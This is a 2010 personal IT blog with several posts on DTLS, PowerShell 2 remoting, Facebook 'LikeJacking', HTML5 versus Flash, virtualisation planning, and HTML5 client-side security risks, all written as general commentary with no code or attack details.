Tuesday, June 29, 2010

Datagram Transport Level Security - DTLS

With the never ending onslaught of mobile technology and greater security awareness, I though it might be interesting to look at Datagram Transport Level Security (DTLS). The two main methods of securing internet communication are Transport Level Security (TLS) and IPSec. TLS is most obvious for its implementation in securing HTTP traffic i.e. HTTPS but is also used in other areas such as for secure IMAP and SMTP. Its main limitation is that it requires a reliable transport channel, normally TCP and hence is unsuitable for UDP traffic which today includes Voice Over IP and several gaming protocols. IPSec is suitable for UDP traffic but its implementation is far more complicated than TLS as it is designed for peer to peer communication rather than client server.

This led to the emergence of DTLS which as the name suggests is Transport Level Security with UDP as the transport channel. A very readable paper on its detail can be found here.

One widely available implementation of DTLS is Cisco’s Anyconnect Secure Mobility client. It doesn’t appear to follow the full goals of DTLS as the key exchange and handshaking is established over TLS which results in two channels needing to be maintained.

With the emerging popularity of VoIP clients on smart phones, I expect we shall be hearing more about DTLS over the coming months.

Friday, June 25, 2010

Windows Powershell Remoting

Windows Powershell has always offered much promise but with version 1.0 at least often failed to deliver when you got into the detail. In contrast version 2 seems to offer more hope particularly when combined with the remote management feature that comes as standard with Windows Server 2008 R2 and is available as a download for R1.

My evaluation project was to use Powershell to obtain disk space, audit failures in the security event log and an instant processor reading on a couple of remote servers via a web service over HTTP(S).

The first step was to set up a ‘Listener’ on each of the remote servers for which there is “quick config” option that lets you automatically alter the relevant services, registry keys and other options to get you up and running. Making the changes manually isn’t too difficult if the quick config fails as it did for me.

Stage 2 was to establish a connection or session to each of my remote servers from my PC. There are plenty of options for this stage including authorisation and port number but nothing too complicated. The most difficult part was to get the password used for each session to be read from a file rather than needing to type it in each time. Powershell doesn’t allow you to store your password in plain text which although a ‘good’ thing hinders testing and evaluation.

The final stage was to issue the commands themselves. This proved to be extremely simple with the invoke-command and then either by using Powershell builtin commandlets or via WMI.

Of course the above has been possible before, even with vbscript, but Powershell offers some advantage over its predecessors, not least the following.

  • Commands issued to multiple servers run in parallel rather than sequentially.
  • A command can run in the background.
  • Powershell is extremely good at formatting output allowing the returned data to be easily read.
  • The remote connection is over HTTP(S) which is useful for servers in remote data centres or even in the cloud, e.g. with Amazon’s EC2.
  • The remote server listener can be configured to expose a limited set of functionality. Hence even someone with administrative credentials is restricted in the information they can gather.

My overall impression of Powershell 2, particularly the remoting feature is that it is now at the level where it is consistently useful. I’m looking forward to version 3, assuming there will be one.

Monday, June 14, 2010

Like Jacking – Facebook helps to spread the bad news

Facebook has been making the news a lot recently with its so called abuse of privacy. Although certainly important, it’s kind of naïve to post anything to a social network and expect it to be private for ever. I also believe that many people are relaxed about this and some individuals seem positively happy about the fact.

In my opinion Like Jacking poses a bigger threat than weak privacy settings. LikeJacking is based on the Facebook feature that allows web masters to insert a button on their web site which visitors can click on if the like the site content. A link back to the site then appears on the visitor’s Facebook page which is visible to all their friends. The Like Feature is easy to setup and indeed Facebook has a page that will even generate the code for you if you aren’t too hot on HTML and Javascript.

So far so good with no apparent danger. The exploit comes from the fact that it’s not necessary to get a visitor to click on a “Like” button for the link to appear on their Facebook page. There is a good example of how to achieve this here. It’s also easy to manipulate the link and the image displayed with it. It’s quite simple to imagine that someone who visits such a site in error, who also has a lot of Facebook friends, could allow the link to spread in an exponential fashion.

The most obvious use of this exploit is for SPAM purposes. Some people, (well me at least) think that Facebook is exclusively SPAM from people you know so what harm will a little bit more do? It is of course simple to manipulate the “Like” link so that it leads to a website that will attempt to install malicious content on your PC, e.g. keystroke loggers or some kind of botnet for which the consequences can be far more serious. Plenty of these sites exist including ones that you might normally trust. This article reports on a number of websites that have been poisoned via an SQL injection so that a visit to the site will result in an attempt to install Malware .

Thursday, June 3, 2010

HTML5 –The Next Best Thing and the End of Flash

Perhaps fed up with all things Cloud, the IT industry hype machine is turning its attention to HTML5. It shouldn’t really be a surprise given that Steve Jobs has been raving about how it can replace Flash and Microsoft sees their implementation of it as a major selling point for IE9.

When people say HTML5 they often mean CSS3 or one of certain other new web technologies. A good explanation of what is and isn’t HTML5 can be found in this blog from ExtJS.

Despite the hype, HTML5 and related technologies are showing much promise. A good collection of what can be achieved can be found at HTMLWatch. The results are certainly impressive.

Is this really the beginning of the end for Flash? Well Adobe products in general have been a nightmare from a security point of view over the past year, so a viable alternative might be desirable. However, at least part of the reason that so many vulnerabilities have been found in Flash is due to its massive installation base and the subsequent targeting by hackers. It’s not unreasonable to assume that subsequent versions of Flash will be more secure and that the developers who have Flash skills and tools will continue to produce Flash applications.

The real danger to Flash may come from Steve Jobs refusing to allow it on the iPhone and the iPad. Despite the miniscule market share that these products have, they dominate the media agenda. It’s not too difficult to imagine hype beating reason and there being a large scale move away from Flash to supposedly allow for maximum cross platform support irrespective of if this is really true.

Friday, May 21, 2010

Virtualisation. When is it Right for your Business?

It always strikes me as strange that the IT industry which you would think was packed full of rational intelligent people is so susceptible to marketing and fashion. Amongst others we have had the dotcom boom, WAP, any first version of a Microsoft product, and my all time favourite, the death of the router due to the invention of the switch. How could we have been so stupid?

As a former boss of my used to say, “Nobody ever got the sack for buying IBM”. And herein lies the root of the problem. Although many IT professionals claim to be innovative and cutting edge, in reality, their main priority is job preservation and so the “safety in numbers” principle kicks in. They invest in the same technology as everyone else, usually whatever has been “bigged up” in the IT press.

The most obvious technology currently benefitting from the sheep mentality is Cloud Computing but as I’ve blogged on this before, I thought I’d highlight another area doing well from IT fashion, namely Virtualisation.

Virtualisation is useful and does have some real benefits and indeed I use it myself. However I find it annoying that it is promoted almost as a silver bullet solution as if virtualisation is guaranteed to bring lower costs, better scalability and performance as well as more uptime irrespective of the application and its uses. All of these points can be true but more and more I’m coming across cases of companies virtualising large parts of their IT infrastructure without proper analysis of whether or not they will get any real benefits. But enough of the ranting, here are a few tips for what to consider before you start a virtualisation project.

Performance: Something often overlooked is that virtualisation reduces the performance level of your hardware as there is always some overhead from the virtualisation layer. This is not necessarily a problem if you plan to run a few applications that have low load but still require isolation from each other, in fact this is where virtualisation excels. It may become a problem if your applications have some significant usage peaks as the equivalent performance on a virtualised environment will be less than on a physical system. It’s impossible to quantify exactly what this impact will be so it is necessary to analyse your own applications. A couple of examples of testing can be found at WebPerformance Inc and also Microsoft. Be aware as well that the choice of hardware for the virtualisation platform can also have a significant impact for example AMD’s Rapid Virtualization Indexing and Intel’s Extended Page Tables are specifically design to optimise virtualisation.

Cost: The main cost saving from virtualisation comes from requiring less hardware and the reduction in the associated power and data centre space. It is possible to get some reasonably powerful virtualisation software for free if certain advanced functionality is not required. What must not be overlooked is the cost of additional licensing assuming of course you are not using open source software. For example, if you run four virtual Windows Servers on a single VMWare ESXi machine you may need to pay for 4 operating system licences as could be the case for other paid software such as databases and anti-malware packages. It may be cheaper to try to get your applications to run on a single system. You may also find that free Hypervisors are not sufficient for your needs in which case there are licensing costs here as well.

If you want to use some of the more interesting virtualisation features such as dynamically moving virtual machines between physical servers it is necessary to have some kind of storage area network (SAN). If your application has significant disk I/O requirements it is better to use fibre channel rather than iSCSI. Such an option is significantly more expensive than direct attached storage. Again, this is not necessarily a problem but it is important to be sure that you are getting a decent improvement in your service for the money you invest.

Scalability: A big plus point of virtualisation is the way you can dynamically add resources to a virtual machine (VM). Firstly you can let a busy VM take unused resources from a shared pool. If this is not sufficient you can dynamically move other virtual machines to different physical hardware, assuming you have made the relevant investment in a SAN etc, freeing system power for your newly busy application. It sounds great in theory and in some cases it probably is. Once again however, the true benefits are subject to the characteristics of your applications. It would be nice if each application had its peak usage on distinct days at times that were mutually exclusive. It my experience, it is more likely that the opposite is true and so you virtual infrastructure may need to be able to cope with all of your applications experiencing peak load at the same time. Once more, this is not necessarily a problem if you decided that the convenience of being able to easily move you applications between hardware platforms is worth the investment in the infrastructure.

An unwanted side affect of offering easy hardware upgrade is the tendency for deficiencies in applications to be ignored. If more processing power is easily available it is tempting to allocate it to a poorly performing application rather than optimising the code or the configuration.

Availability: Virtualisation can help improve the availability of your applications. With the right configuration when using a SAN if a physical server fails all the virtual machines that had been running on it can be automatically moved to other hardware. The same is true if you need to take down a system for maintenance, e.g. to add new memory. It sounds great but again it is important to assess if your investment is giving you value for money. Do your applications need to be available 24x7x365? Does your SLA allow for a couple of hours down time in order for you to recover a faulty system? How often do you expect your hardware to actually fail? My own experience is that if you run a server less than 5 years old in an environment with proper temperature control and consistent power, with the exception of disk drives which should be protected by RAID, failure is rare. Also consider that SANs may fail too which could leave you with a huge single point of failure.

To conclude virtualisation can add real value to your business but before implementing it is necessary to do a proper analysis to see if what you gain adds true value for money.

Tuesday, May 18, 2010

HTML 5 – Security Challenges

No post recently due to the extreme lack of anything interesting to post about. Finally yesterday something turned up via the unlikely source of a Linkedin group. Linkedin Groups are usually a hotbed of inanity or self promotionists but the OWASP French Chapter bucked the trend by pointing me in the direction of this HTML 5 article on eWEEK. Much in the news recently due to discussions about the H.264 video format, new features in HTML 5 present some interesting challenges for security. Client side storage is one area highlighted in the article. HTML 5 allows for three types of client side storage which are:

Session Storage similar to cookies but with much more information.

Local Storage, similar to session storage but available to all browser windows and persistent after a window is closed.

Database Storage: Structured data saved in a real local SQL database

The most obvious security risk that springs to mind is data leakage left after an application is closed but there are also other possibilities such as cross domain request forgery and perhaps even local SQL injection!

The article also highlights that the scope for cross domain communication by JavaScript is increased with HTML 5 which allows for more powerful applications but also opens up abuse possibilities.

A little extra research seems to suggest that the above features can be implemented securely but as ever it depends on the developer’s ability to understand the technology and to be aware of how to code in a secure manner.